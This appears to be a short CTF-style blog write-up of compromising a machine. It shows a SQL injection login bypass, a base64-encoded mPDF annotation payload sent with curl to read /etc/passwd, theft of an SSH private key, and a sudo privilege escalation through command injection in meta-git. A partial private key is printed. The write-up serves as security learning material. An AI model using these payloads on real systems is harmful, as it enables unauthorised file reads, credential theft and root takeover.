Sign in Subscribe
2 min read RCE

mPDF read any file and meta-git RCE to root

mPDF – mPDF Manual
mPDF is a PHP library which generates PDF files from UTF-8 encoded HTML. It is based on FPDF and HTML2FPDF, with a number of enhancements.

Website

logged in as admin with sql injection bypass ‘or 1=’1’#.
Using Burp Suite checking the request
Decrypting it using base64 decrypt 
Interesting info from GitHub 
https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

using CyberChef 

❯ curl http://xxxxxxxxxxx/admin/download.php -H "Cookie: PHPSESSID=dd213s23d8mg2kds8fo10hf9hib" -d "pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Y y9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGF zc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1M jB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V 0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyM iUyNTIwLyUyNTNF"

Result Output: OKdAtpf213e12edyJeFWPExZ0H.pdf

❯ curl http://xxxxxx/mpdf/tmp/OKdAtpf213e12edyJeFWPExZ0H.pdf --output passwd.pdf

CMD AGAIN

Reading the pdf i was able to read passwd.
Then i was able to read id_rsa  and get user ssh access ! 

using linpease , pspsy have nothing interesting 

sudo -l

User may run the following commands on faculty:(root) /usr/local/bin/meta-git

found this report online informing there is exec p0c in npm (RCE via insecure command formatting)
Node.js third-party modules disclosed on HackerOne: [meta-git] RCE...
I would like to report a `RCE` issue in the `meta-git` module. It allows to execute `arbitrary commands remotely inside the victim’s PC` # Module **module name:** `meta-git` **version:**…
HackerOne

Github Check !

xxxxx@xxxxxxxxxxxx:/$ sudo -u root 
meta-git clone 'tcpguard| whoami' 
meta git cloning into 'tcpguard| whoami' at tcpguard| 
whoami tcpguard| whoami: fatal: repository 'tcpguard' does not exist 
whoami: ‘tcpguard’: no such user root
user@xxxxxxxxxxxxx:/$ sudo -u root meta-git clone 'tcpguard| cat ~/.ssh/id_rsa' 
meta git cloning into 'tcpguard| cat ~/.ssh/id_rsa' at id_rsa 
id_rsa: fatal: repository 'tcpguard' does not exist
 -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAA
AAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAxDAgrHcD2I4U329//sdapn4ncVzRYZxACC/cz
xmSO5Us2S87dxyw izZ0hDszHyk+bCB5B1wvrtmAFu2KN4aGCoAJMNGmVocBnIkSczGp/zBy0pVK6H7g6GM
AVS pribX/DrdHCcmsIu7WqkyZ0mDN2sS+3uMk6I3361x2ztAG1aC9xJX7EJsHmXDRLZ8G1Rib KpI0WqAW
NSXHDDvcwDpmWDk+NlIRKkpGcV.....

trying to read root ssh key

Published by:

1337

You might also like...

Jun
17

treport Misconfigure

1 min read